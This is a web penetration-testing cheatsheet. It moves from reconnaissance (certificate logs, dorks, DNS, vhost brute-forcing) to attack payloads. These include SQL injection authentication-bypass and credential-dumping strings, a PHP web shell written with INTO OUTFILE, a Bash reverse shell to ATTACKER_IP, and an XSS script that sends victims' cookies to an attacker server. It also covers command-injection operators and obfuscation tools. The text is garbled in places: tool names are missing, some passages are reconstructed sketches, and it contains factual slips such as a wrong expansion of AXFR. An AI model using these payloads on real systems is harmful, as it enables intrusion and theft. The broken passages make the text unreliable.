Web pentest cheatsheet
Consider using web spiders such as , , and for extracting data from websites.
Certificate Transparency (CT) logs offer a treasure trove of subdomain information for passive reconnaissance. These publicly accessible logs record SSL/TLS certificates issued for domains and their subdomains, serving as a security measure to prevent fraudulent certificates. For reconnaissance, they offer a window into potentially overlooked subdomains.
The crt.sh website provides a searchable interface for CT logs. To efficiently extract subdomains from crt.sh within your terminal, you can use a command like this:
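The original command isn't preserved here; the following is a sketch that matches the description below (example.com is a placeholder):

```bash
# Query crt.sh for certificates matching %.example.com and extract unique subdomains
curl -s "https://crt.sh/?q=%25.example.com&output=json" | jq -r '.[].name_value' | sed 's/^\*\.//' | sort -u
```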
This command fetches JSON-formatted data from crt.sh for example.com (the % is a wildcard), extracts domain names using jq, removes any wildcard prefixes (*.) with sed, and finally sorts and deduplicates the results.
is also a great resource for internet-connected devices, with advanced filtering by domain, IP, or certificate attributes.
Web crawling is the automated exploration of a website's structure. A web crawler, or spider, systematically navigates through web pages by following links, mimicking a user's browsing behavior. This process maps out the site's architecture and gathers valuable information embedded within the pages.
A crucial file that guides web crawlers is robots.txt. This file resides in a website's root directory and dictates which areas are off-limits for crawlers. Analyzing robots.txt can reveal hidden directories or sensitive areas that the website owner doesn't want indexed by search engines.
Scrapy is a powerful and efficient Python framework for large-scale web crawling and scraping projects. It provides a structured approach to defining crawling rules, extracting data, and handling various output formats. Here's a basic Scrapy spider example to extract links from example.com:
Code: python
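```python
# Hedged reconstruction of the basic spider described above (not necessarily the original code).
# Save as example_spider.py and run with:  scrapy runspider example_spider.py -o example_data.json
import scrapy


class ExampleSpider(scrapy.Spider):
    name = "example"
    start_urls = ["http://example.com/"]

    def parse(self, response):
        # Record every link found on the current page
        for href in response.css("a::attr(href)").getall():
            yield {"link": response.urljoin(href)}
        # Follow links to keep crawling the site
        for href in response.css("a::attr(href)").getall():
            yield response.follow(href, callback=self.parse)
```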
After running the Scrapy spider, you'll have a file containing scraped data (e.g., example_data.json). You can analyze these results using standard command-line tools. For instance, to extract all links:
Code: bash
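```bash
# Hedged reconstruction of the pipeline described below; assumes each JSON object
# has a "link" field, as produced by the spider sketch above.
jq -r '.[].link' example_data.json | awk -F'.' '{print $NF}' | sort | uniq -c
```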
This command uses jq to extract links, awk to isolate file extensions, sort to order them, and uniq -c to count their occurrences. By scrutinizing the extracted data, you can identify patterns, anomalies, or sensitive files that might be of interest for further investigation.
Leveraging search engines for reconnaissance involves utilizing their vast indexes of web content to uncover information about your target. This passive technique, often referred to as Open Source Intelligence (OSINT) gathering, can yield valuable insights without directly interacting with the target's systems.
By employing advanced search operators and specialized queries known as "Google Dorks," you can pinpoint specific information buried within search results. Here's a table of some useful search operators for web reconnaissance:
| Operator | Description | Example | Example Description |
| --- | --- | --- | --- |
| site: | Limits results to a specific website or domain. | site:example.com | Find all publicly accessible pages on example.com. |
| inurl: | Finds pages with a specific term in the URL. | inurl:login | Search for login pages on any website. |
| filetype: | Searches for files of a particular type. | filetype:pdf | Find downloadable PDF documents. |
| intitle: | Finds pages with a specific term in the title. | intitle:"confidential report" | Look for documents titled "confidential report" or similar variations. |
| intext: or inbody: | Searches for a term within the body text of pages. | intext:"password reset" | Identify webpages containing the term "password reset". |
| cache: | Displays the cached version of a webpage (if available). | cache:example.com | View the cached version of example.com to see its previous content. |
| link: | Finds pages that link to a specific webpage. | link:example.com | Identify websites linking to example.com. |
| related: | Finds websites related to a specific webpage. | related:example.com | Discover websites similar to example.com. |
| info: | Provides a summary of information about a webpage. | info:example.com | Get basic details about example.com, such as its title and description. |
| define: | Provides definitions of a word or phrase. | define:phishing | Get a definition of "phishing" from various sources. |
| numrange: | Searches for numbers within a specific range. | site:example.com numrange:1000-2000 | Find pages on example.com containing numbers between 1000 and 2000. |
| allintext: | Finds pages containing all specified words in the body text. | allintext:admin password reset | Search for pages containing both "admin" and "password reset" in the body text. |
| allinurl: | Finds pages containing all specified words in the URL. | allinurl:admin panel | Look for pages with "admin" and "panel" in the URL. |
| allintitle: | Finds pages containing all specified words in the title. | allintitle:confidential report 2023 | Search for pages with "confidential," "report," and "2023" in the title. |
| AND | Narrows results by requiring all terms to be present. | site:example.com AND (inurl:admin OR inurl:login) | Find admin or login pages specifically on example.com. |
| OR | Broadens results by including pages with any of the terms. | "linux" OR "ubuntu" OR "debian" | Search for webpages mentioning Linux, Ubuntu, or Debian. |
| NOT | Excludes results containing the specified term. | site:bank.com NOT inurl:login | Find pages on bank.com excluding login pages. |
| * (wildcard) | Represents any character or word. | site:socialnetwork.com filetype:pdf user* manual | Search for user manuals (user guide, user handbook) in PDF format on socialnetwork.com. |
| .. (range search) | Finds results within a specified numerical range. | site:ecommerce.com "price" 100..500 | Look for products priced between 100 and 500 on an e-commerce website. |
| " " (quotation marks) | Searches for exact phrases. | "information security policy" | Find documents mentioning the exact phrase "information security policy". |
| - (minus sign) | Excludes terms from the search results. | site:news.com -inurl:sports | Search for news articles on news.com excluding sports-related content. |
Google Dorking, also known as Google Hacking, is a technique that leverages the power of search operators to uncover sensitive information, security vulnerabilities, or hidden content on websites, using Google Search.
Finding Login Pages:
- site:example.com inurl:login
- site:example.com (inurl:login OR inurl:admin)

Identifying Exposed Files:
- site:example.com filetype:pdf
- site:example.com (filetype:xls OR filetype:docx)

Uncovering Configuration Files:
- site:example.com inurl:config.php
- site:example.com (ext:conf OR ext:cnf) (searches for extensions commonly used for configuration files)

Locating Database Backups:
- site:example.com inurl:backup
- site:example.com filetype:sql
By creatively combining these operators and crafting targeted queries, you can uncover sensitive documents, exposed directories, login pages, and other valuable information that may aid in your reconnaissance efforts.
There is a good resource I found that lets you generate interesting queries for GitHub, Shodan, and Google:
The Wayback Machine is a digital archive of the World Wide Web. It allows users to go back in time and view snapshots of a website. The Wayback Machine operates by using web crawlers to capture snapshots of websites at regular intervals. These crawlers navigate through the web, following links and indexing pages, much like search engine crawlers do. However, instead of simply indexing the information for search purposes, the Wayback Machine stores the entire content of the pages, including HTML, CSS, JavaScript, images, and other resources. Factors that influence the capture frequency include the website's popularity, its rate of change, and the resources available to the Internet Archive.
These frameworks aim to provide a complete suite of tools for web reconnaissance:
Use HTTPRECON for general web reconnaissance. An example of tool execution could be:
To use dnsenum for subdomain brute-forcing, you'll typically provide it with the target domain and a wordlist containing potential subdomain names. The tool will then systematically query the DNS server for each potential subdomain and report any that exist.
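A sketch of such a run (the wordlist path is a placeholder; adjust it to whatever list you use):

```bash
dnsenum --enum example.com -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -r
```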
-r: This option enables recursive subdomain brute-forcing, meaning that if dnsenum finds a subdomain, it will then try to enumerate subdomains of that subdomain.
The Domain Name System (DNS) functions as the internet's GPS, translating user-friendly domain names into the numerical IP addresses computers use to communicate. Like GPS converting a destination's name into coordinates, DNS ensures your browser reaches the correct website by matching its name with its IP address. This eliminates memorizing complex numerical addresses, making web navigation seamless and efficient.
The dig command allows you to query DNS servers directly, retrieving specific information about domain names. For instance, if you want to find the IP address associated with example.com, you can execute the following command:
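```bash
# Query the A record for example.com
dig example.com A
```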
This command instructs dig to query the DNS for the A record (which maps a hostname to an IPv4 address) of example.com. The output will typically include the requested IP address, along with additional details about the query and response. By mastering the dig command and understanding the various DNS record types, you gain the ability to extract valuable information about a target's infrastructure and online presence.
Before using the whois command, you'll need to ensure it's installed on your Linux system. It's a utility available through Linux package managers, and if it's not installed, it can be installed simply with:
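```bash
# On Debian/Ubuntu-based systems (the package manager may differ on other distros)
sudo apt update && sudo apt install whois -y
```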
Utilising WHOIS
The simplest way to access WHOIS data is through the whois command-line tool. Let's perform a WHOIS lookup on facebook.com:
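```bash
# The lookup described above
whois facebook.com
```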
The WHOIS output for facebook.com reveals several key details:
Domain Registration:
- Registrar: RegistrarSafe, LLC
- Creation Date: 1997-03-29
- Expiry Date: 2033-03-30
These details indicate that the domain is registered with RegistrarSafe, LLC, and has been active for a considerable period, suggesting its legitimacy and established online presence. The distant expiry date further reinforces its longevity.
Domain Owner:
- Registrant/Admin/Tech Organization: Meta Platforms, Inc.
- Registrant/Admin/Tech Contact: Domain Admin
This information identifies Meta Platforms, Inc. as the organization behind facebook.com, and "Domain Admin" as the point of contact for domain-related matters. This is consistent with the expectation that Facebook, a prominent social media platform, is owned by Meta Platforms, Inc.
Domain Status:
- clientDeleteProhibited, clientTransferProhibited, clientUpdateProhibited, serverDeleteProhibited, serverTransferProhibited, and serverUpdateProhibited
These statuses indicate that the domain is protected against unauthorized changes, transfers, or deletions on both the client and server sides. This highlights a strong emphasis on security and control over the domain.
Name Servers:
- A.NS.FACEBOOK.COM, B.NS.FACEBOOK.COM, C.NS.FACEBOOK.COM, D.NS.FACEBOOK.COM
These name servers are all within the facebook.com domain, suggesting that Meta Platforms, Inc. manages its own DNS infrastructure. It is common practice for large organizations to maintain control and reliability over their DNS resolution.
Overall, the WHOIS output for facebook.com aligns with expectations for a well-established and secure domain owned by a large organization like Meta Platforms, Inc.
While the WHOIS record provides contact information for domain-related issues, it might not be directly helpful in identifying individual employees or specific vulnerabilities. This highlights the need to combine WHOIS data with other reconnaissance techniques to understand the target's digital footprint comprehensively.
DNS zone transfers, also known as AXFR (Asynchronous Full Transfer) requests, offer a potential goldmine of information for web reconnaissance. A zone transfer is a mechanism for replicating DNS data across servers. When a zone transfer is successful, it provides a complete copy of the DNS zone file, which contains a wealth of details about the target domain.
To attempt a zone transfer, you can use the dig command with the axfr (full zone transfer) option. For example, to request a zone transfer from the DNS server ns1.example.com for the domain example.com, you would execute:
Code: bash
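```bash
# Hedged reconstruction of the zone-transfer request described above
dig axfr @ns1.example.com example.com
```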
However, zone transfers are not always permitted. Many DNS servers are configured to restrict zone transfers to authorized secondary servers only. Misconfigured servers, though, may allow zone transfers from any source, inadvertently exposing sensitive information.
Virtual hosting is a technique that allows multiple websites to share a single IP address. Each website is associated with a unique hostname, which is used to direct incoming requests to the correct site. This can be a cost-effective way for organizations to host multiple websites on a single server, but it can also create a challenge for web reconnaissance.
Since multiple websites share the same IP address, simply scanning the IP won't reveal all the hosted sites. You need a tool that can test different hostnames against the IP address to see which ones respond.
Gobuster is a versatile tool that can be used for various types of brute-forcing, including virtual host discovery. Its vhost mode is designed to enumerate virtual hosts by sending requests to the target IP address with different hostnames. If a virtual host is configured for a specific hostname, Gobuster will receive a response from the web server. To use Gobuster to brute-force virtual hosts, you'll need a wordlist containing potential hostnames. Here's an example command:
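```bash
# Target and wordlist path are placeholders; adjust to your engagement
gobuster vhost -u http://TARGET_IP -w /usr/share/wordlists/subdomains.txt
```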
Use Wfuzz to replace "FUZZ" with words from your wordlist to identify subdomains:
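```bash
# Wordlist path is a placeholder; --hc 404 hides "not found" responses
wfuzz -c -w /usr/share/wordlists/subdomains.txt --hc 404 "http://FUZZ.example.com/"
```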
Specify the -x option to filter on specific extensions:
Use Gobuster to guess directories and subdomains of a specific web application:
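A sketch of both modes (wordlist paths are examples; -x searches for the extensions mentioned above in dir mode):

```bash
# Directory brute-forcing, limited to specific extensions with -x
gobuster dir -u http://example.com -w /usr/share/wordlists/dirb/common.txt -x php,html,txt

# Subdomain brute-forcing
gobuster dns -d example.com -w /usr/share/wordlists/subdomains.txt
```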
Note: You can use wordlists located in /usr/share/wordlists/*.
Use Nmap to enumerate directories on a target website:
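```bash
# Uses the http-enum NSE script; the port list is an assumption
nmap -p 80,443 --script http-enum example.com
```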
You can also use Burp Suite Intruder and DirBuster to discover content on the web application.
These commands are utilized for discovering directories on a web server, detecting vulnerabilities such as ShellShock, and potentially exploiting these vulnerabilities to gain unauthorized access or execute commands on the server.
Footprint a website for web directory structure:
Perform a dynamic scan to extract emails, backdoors, and external hosts:
Detect host mappings using:
Detect web application firewalls:
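The original command isn't preserved; one commonly used tool here is wafw00f (an assumption about which tool was intended):

```bash
wafw00f https://example.com
```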
Trace HTTP requests:
Before we start subverting the web application's logic and attempting to bypass the authentication, we first have to test whether the login form is vulnerable to SQL injection. To do that, we will try to add one of the below payloads after our username and see if it causes any errors or changes how the page behaves:
In some cases, we may have to use the URL-encoded version of the payload, for example when we put our payload directly in the URL (i.e., in an HTTP GET request).
| Payload | URL-Encoded |
| --- | --- |
| ' | %27 |
| " | %22 |
| # | %23 |
| ; | %3B |
| ) | %29 |
| Command | Description |
| --- | --- |
| **General** | |
| mysql -u root -h docker.hackthebox.eu -P 3306 -p | Login to MySQL database |
| SHOW DATABASES | List available databases |
| USE users | Switch to database |
| **Tables** | |
| CREATE TABLE logins (id INT, ...) | Add a new table |
| SHOW TABLES | List available tables in current database |
| DESCRIBE logins | Show table properties and columns |
| INSERT INTO table_name VALUES (value_1,..) | Add values to table |
| INSERT INTO table_name(column2, ...) VALUES (column2_value, ..) | Add values to specific columns in a table |
| UPDATE table_name SET column1=newvalue1, ... WHERE <condition> | Update table values |
| **Columns** | |
| SELECT * FROM table_name | Show all columns in a table |
| SELECT column1, column2 FROM table_name | Show specific columns in a table |
| DROP TABLE logins | Delete a table |
| ALTER TABLE logins ADD newColumn INT | Add new column |
| ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn | Rename column |
| ALTER TABLE logins MODIFY oldColumn DATE | Change column datatype |
| ALTER TABLE logins DROP oldColumn | Delete column |
| **Output** | |
| SELECT * FROM logins ORDER BY column_1 | Sort by column |
| SELECT * FROM logins ORDER BY column_1 DESC | Sort by column in descending order |
| SELECT * FROM logins ORDER BY column_1 DESC, id ASC | Sort by two columns |
| SELECT * FROM logins LIMIT 2 | Only show first two results |
| SELECT * FROM logins LIMIT 1, 2 | Only show first two results starting from index 2 |
| SELECT * FROM table_name WHERE <condition> | List results that meet a condition |
| SELECT * FROM logins WHERE username LIKE 'admin%' | List results where the name is similar to a given string |
MySQL operator precedence (from highest to lowest):
- Division (/), Multiplication (*), and Modulus (%)
- Addition (+) and Subtraction (-)
- Comparison (=, >, <, <=, >=, !=, LIKE)
- NOT (!)
- AND (&&)
- OR (||)
| Payload | Description |
| --- | --- |
| **Auth Bypass** | |
| admin' or '1'='1 | Basic Auth Bypass |
| admin' or 1 = 1 -- - | Basic Auth Bypass with comments |
| admin')-- - | Basic Auth Bypass with comments |
| **Union Injection** | |
| ' order by 1-- - | Detect number of columns using order by |
| cn' UNION select 1,2,3-- - | Detect number of columns using Union injection |
| cn' UNION select 1,@@version,3,4-- - | Basic Union injection |
| UNION select username, 2, 3, 4 from passwords-- - | Union injection for 4 columns |
| **DB Enumeration** | |
| SELECT @@version | Fingerprint MySQL with query output |
| SELECT SLEEP(5) | Fingerprint MySQL with no output |
| cn' UNION select 1,database(),2,3-- - | Current database name |
| cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- - | List all databases |
| cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- - | List all tables in a specific database |
| cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- - | List all columns in a specific table |
| cn' UNION select 1, username, password, 4 from dev.credentials-- - | Dump data from a table in another database |
| **Privileges** | |
| cn' UNION SELECT 1, user(), 3, 4-- - | Find current user |
| cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- - | Find if user has admin privileges |
| cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- - | Find all user privileges |
| cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- - | Find which directories can be accessed through MySQL |
| **File Injection** | |
| cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- - | Read local file |
| select 'file written successfully!' into outfile '/var/www/html/proof.txt' | Write a string to a local file |
| cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- - | Write a web shell into the base web directory |
- Use the following command to test a specific IP or URL for SQL injection vulnerabilities:
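The command itself isn't preserved; given the sqlmap tamper-script table below, a typical sqlmap invocation would be (URL is a placeholder):

```bash
sqlmap -u "http://example.com/index.php?id=1" --batch --dbs
```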
| Tamper-Script | Description |
| --- | --- |
| 0eunion | Replaces instances of UNION with e0UNION |
| base64encode | Base64-encodes all characters in a given payload |
| between | Replaces greater-than operator (>) with NOT BETWEEN 0 AND # and equals operator (=) with BETWEEN # AND # |
| commalesslimit | Replaces (MySQL) instances like LIMIT M, N with its LIMIT N OFFSET M counterpart |
| equaltolike | Replaces all occurrences of operator equal (=) with its LIKE counterpart |
| halfversionedmorekeywords | Adds (MySQL) versioned comment before each keyword |
| modsecurityversioned | Embraces complete query with (MySQL) versioned comment |
| modsecurityzeroversioned | Embraces complete query with (MySQL) zero-versioned comment |
| percentage | Adds a percentage sign (%) in front of each character (e.g. SELECT -> %S%E%L%E%C%T) |
| plus2concat | Replaces plus operator (+) with (MsSQL) function CONCAT() counterpart |
| randomcase | Replaces each keyword character with random case value (e.g. SELECT -> SEleCt) |
| space2comment | Replaces space character ( ) with comments (`/**/`) |
| space2dash | Replaces space character ( ) with a dash comment (--) followed by a random string and a new line (\n) |
| space2hash | Replaces (MySQL) instances of space character ( ) with a pound character (#) followed by a random string and a new line (\n) |
| space2mssqlblank | Replaces (MsSQL) instances of space character ( ) with a random blank character from a valid set of alternate characters |
| space2plus | Replaces space character ( ) with plus (+) |
| space2randomblank | Replaces space character ( ) with a random blank character from a valid set of alternate characters |
| symboliclogical | Replaces AND and OR logical operators with their symbolic counterparts (&& and \|\|) |
| versionedkeywords | Encloses each non-function keyword with (MySQL) versioned comment |
| versionedmorekeywords | Encloses each keyword with (MySQL) versioned comment |
To create a more stable reverse shell, use the following payload:
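The original payload isn't preserved here; one commonly used option (an assumption, with IP and port as placeholders) is a Bash reverse shell one-liner:

```bash
bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'
```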
Exploit local file inclusion vulnerabilities using direct HTTP requests:
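```bash
# Parameter name and traversal depth are placeholders
curl "http://example.com/index.php?page=../../../../etc/passwd"
```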
The inclusion occurs due to the include() function in PHP, where directory traversal allows unauthorized file access.
XSS vulnerabilities take advantage of a flaw in user input sanitization to "write" JavaScript code to the page and execute it on the client side, leading to several types of attacks.
To return the victim to the original page and reduce suspicion, we can host a PHP page on our web server.
PHP example code that we can place under /tmp/tmpserver/ and call index.php (don't forget to change the Server_IP to the website or IP that you are testing):
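```php
<?php
// Minimal illustrative sketch: bounce the victim back to the original page so the
// interaction looks normal. Change Server_IP to the website or IP you are testing.
header("Location: http://Server_IP/index.php");
exit();
?>
```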
Some payloads are especially useful if the angle brackets are HTML-encoded and escaped, for example when injecting into an href attribute whose double quotes are HTML-encoded.

If we identify XSS, we can use it to steal a user's cookies with the following example approach:
1. Host a PHP script on your web server that captures a parameter and saves its content to a file (see the sketch after this list).
2. Inject one of the following payloads to steal the user's cookies through XSS.
3. If the XSS is successful, we will get the user's cookies in the cookie.txt file.
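A sketch of this approach (names are illustrative; the script assumes the cookie arrives in a c parameter and appends it to cookie.txt, matching the file mentioned above):

```php
<?php
// Cookie-capture endpoint: append the received value to cookie.txt
if (isset($_GET['c'])) {
    $file = fopen("cookie.txt", "a+");
    fwrite($file, "Victim cookie: " . $_GET['c'] . "\n");
    fclose($file);
}
?>
```

An example payload that ships the victim's cookies to that script (replace ATTACKER_IP accordingly):

```html
<script>new Image().src='http://ATTACKER_IP/index.php?c='+document.cookie;</script>
```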
While reflected XSS sends the input data to the back-end server through HTTP requests, DOM XSS is processed entirely on the client side through JavaScript. DOM XSS occurs when JavaScript is used to change the page source through the Document Object Model (DOM). If the parameter starts with "#", as in http://SERVER_IP:PORT/#task=<img src=, it means that the parameter is processed by JavaScript through the DOM and never sent to the back-end server.
jQuery vulnerable code - DOM XSS:
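```javascript
// Illustrative sketch (not necessarily the original snippet): the value after "#task="
// is read from the URL fragment and written to the page with .html(), which renders
// attacker-controlled markup, e.g. <img src=x onerror=alert(1)>.
var task = decodeURIComponent(window.location.hash.split('=')[1]);
$("#todo").html(task);
```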
Executing JavaScript inside the href attribute:
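```html
<!-- Illustrative payload: a javascript: URI runs when the link is clicked -->
<a href="javascript:alert(document.cookie)">click me</a>
```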
XSStrike is a powerful Python tool that automates the detection of XSS vulnerabilities in parameters:
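```bash
# Assumes XSStrike is cloned and its requirements installed; URL and parameter are placeholders
python3 xsstrike.py -u "http://example.com/index.php?search=test"
```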
If you get an error from Python when you try to install the requirements, you might need to create a virtual environment, which allows you to manage Python packages independently of the system Python.
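For example:

```bash
python3 -m venv venv               # create an isolated environment
source venv/bin/activate           # activate it
pip install -r requirements.txt    # install the tool's requirements inside the venv
```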
Other useful resources with interesting XSS payloads:
| Injection Operator | Injection Character | URL-Encoded Character | Executed Command |
| --- | --- | --- | --- |
| Semicolon | ; | %3b | Both |
| New Line | \n | %0a | Both |
| Background | & | %26 | Both (second output generally shown first) |
| Pipe | \| | %7c | Both (second output is shown) |
| AND | && | %26%26 | Both (only if first succeeds) |
| OR | \|\| | %7c%7c | Second (only if first fails) |
| Sub-Shell | `` | %60%60 | Both (Linux-only) |
| Sub-Shell | $() | %24%28%29 | Both (Linux-only) |
Bashfuscator: Once we have the tool set up, we can start using it from the ./bashfuscator/bin/ directory. There are many flags we can use with the tool to fine-tune our final obfuscated command, as we can see in the -h help menu.
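For example (the command being obfuscated is arbitrary):

```bash
cd ./bashfuscator/bin/
./bashfuscator -c 'cat /etc/passwd'
```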
Here are some common examples of Google Dorks; for more examples, refer to the :
: A Python-based reconnaissance tool offering a range of modules for different tasks like SSL certificate checking, Whois information gathering, header analysis, and crawling. Its modular structure enables easy customisation for specific needs.
: A powerful framework written in Python that offers a modular structure with various modules for different reconnaissance tasks. It can perform DNS enumeration, subdomain discovery, port scanning, web crawling, and even exploit known vulnerabilities.
: Specifically designed for gathering email addresses, subdomains, hosts, employee names, open ports, and banners from different public sources like search engines, PGP key servers, and the SHODAN database. It is a command-line tool written in Python.
: An open-source intelligence automation tool that integrates with various data sources to collect information about a target, including IP addresses, domain names, email addresses, and social media profiles. It can perform DNS lookups, web crawling, port scanning, and more.
: A collection of various tools and resources for open-source intelligence gathering. It covers a wide range of information sources, including social media, search engines, public records, and more.
web extension can also be used to identify website technologies
is a Web technology profiler that provides detailed reports on a website's technology stack.
The MySQL documentation states that the AND operator is evaluated before the OR operator. This means that if there is at least one TRUE condition in the entire query along with an OR operator, the entire query will evaluate to TRUE, since the OR operator returns TRUE if one of its operands is TRUE.
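As a quick illustration (hypothetical logins table), the AND is evaluated first, so an injected OR '1'='1' makes the whole WHERE clause TRUE even though the password check fails:

```sql
SELECT * FROM logins WHERE username = 'admin' AND password = 'wrong' OR '1' = '1';
```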
Note: To write a web shell, we must know the base web directory for the web server (i.e. the web root). One way to find it is to use load_file to read the server configuration, like Apache's configuration found at /etc/apache2/apache2.conf, Nginx's configuration at /etc/nginx/nginx.conf, or the IIS configuration at %WinDir%\System32\Inetsrv\Config\ApplicationHost.config, or we can search online for other possible configuration locations. Furthermore, we may run a fuzzing scan and try to write files to different possible web roots, using or . Finally, if none of the above works, we can use server errors displayed to us and try to find the web directory that way.
To learn more about the basics of XSS, refer to this section
DOSfuscation: There is also a very similar tool that we can use for Windows called . Unlike Bashfuscator, this is an interactive tool, as we run it once and interact with it to get the desired obfuscated command. We can once again clone the tool from GitHub and then invoke it through PowerShell, as follows:
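Assuming the elided tool name is Invoke-DOSfuscation (an assumption, since the name is not preserved above), the steps typically look like:

```powershell
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation
```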